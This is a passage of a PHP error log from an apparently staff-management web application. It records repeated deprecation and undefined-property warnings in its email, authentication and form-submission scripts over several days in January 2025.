/home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 09:30:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:30:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:31:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:31:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:31:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:31:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:32:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:32:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:32:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:32:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:33:43 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:33:57 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:34:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:34:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:34:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:34:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:35:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:35:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:36:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:36:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:36:32 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:37:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 09:37:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:13:56 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 12:14:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:14:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:14:59 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:15:58 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:16:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:44:58 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 12:45:42 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:46:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:47:10 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:47:22 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:48:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:48:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:48:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:49:30 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:49:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:50:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:50:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:50:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:51:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 12:51:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:06:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:16:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:16:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:32:19 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:34:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [23-Jan-2025 23:37:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:37:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:38:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:38:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [23-Jan-2025 23:40:09 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 00:49:30 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 00:59:11 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 01:10:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:10:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:35:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 01:36:56 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:37:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:37:21 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:37:34 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:38:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:38:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 01:38:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 02:25:17 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 02:25:18 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 02:28:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:33:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:44:27 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:45:57 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:51:39 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 03:53:32 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 04:16:02 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:00:00 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:20:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 05:22:42 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:30:38 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:35:31 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 05:36:03 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 05:49:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "subtask_id" in /home/emeraadmin/public_html/pages/submit_form.php on line 10 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "schoolName" in /home/emeraadmin/public_html/pages/submit_form.php on line 11 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "date" in /home/emeraadmin/public_html/pages/submit_form.php on line 12 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "time" in /home/emeraadmin/public_html/pages/submit_form.php on line 13 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "notes" in /home/emeraadmin/public_html/pages/submit_form.php on line 15 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "clientName" in /home/emeraadmin/public_html/pages/submit_form.php on line 16 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "staffName" in /home/emeraadmin/public_html/pages/submit_form.php on line 17 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "clientSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 18 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "staffSignature" in /home/emeraadmin/public_html/pages/submit_form.php on line 19 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "latitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 20 [24-Jan-2025 06:13:39 UTC] PHP Warning: Undefined array key "longitude" in /home/emeraadmin/public_html/pages/submit_form.php on line 21 [24-Jan-2025 06:14:55 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 06:26:52 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [24-Jan-2025 06:53:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 06:53:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 07:10:23 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 07:12:54 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 10:37:44 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [24-Jan-2025 11:06:59 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [25-Jan-2025 01:22:24 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Jan-2025 05:20:14 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [26-Jan-2025 05:24:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:24:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:24:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:01 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:31 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:25:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:30:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:31:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:31:39 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:31:47 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:31:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 05:32:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [26-Jan-2025 10:59:10 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 10:31:25 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 10:37:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:37:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:37:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:38:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:39:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:39:35 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:40:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:42:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:42:49 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:43:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:44:16 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:44:33 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:45:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 10:58:36 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 11:00:00 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:00:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:01:25 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:01:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:02:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:06:02 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:06:27 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:06:38 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:06:54 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:08:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:13:08 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:13:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:13:29 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:13:40 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 11:14:50 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:22:43 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 20:23:18 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:23:44 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:23:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:24:07 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 20:24:17 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:46:21 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [27-Jan-2025 23:47:04 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:14 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:24 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:46 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:47:55 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:48:12 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:48:20 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:48:28 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:48:36 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [27-Jan-2025 23:54:08 UTC] PHP Warning: Undefined property: stdClass::$status in /home/emeraadmin/public_html/pages/authenticateuser.php on line 19 [28-Jan-2025 00:57:15 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:57:26 UTC] PHP Deprecated: strtotime(): Passing null to parameter #1 ($datetime) of type string is deprecated in /home/emeraadmin/public_html/pages/send_email_to_workers.php on line 98 [28-Jan-2025 00:57:40 UTC] 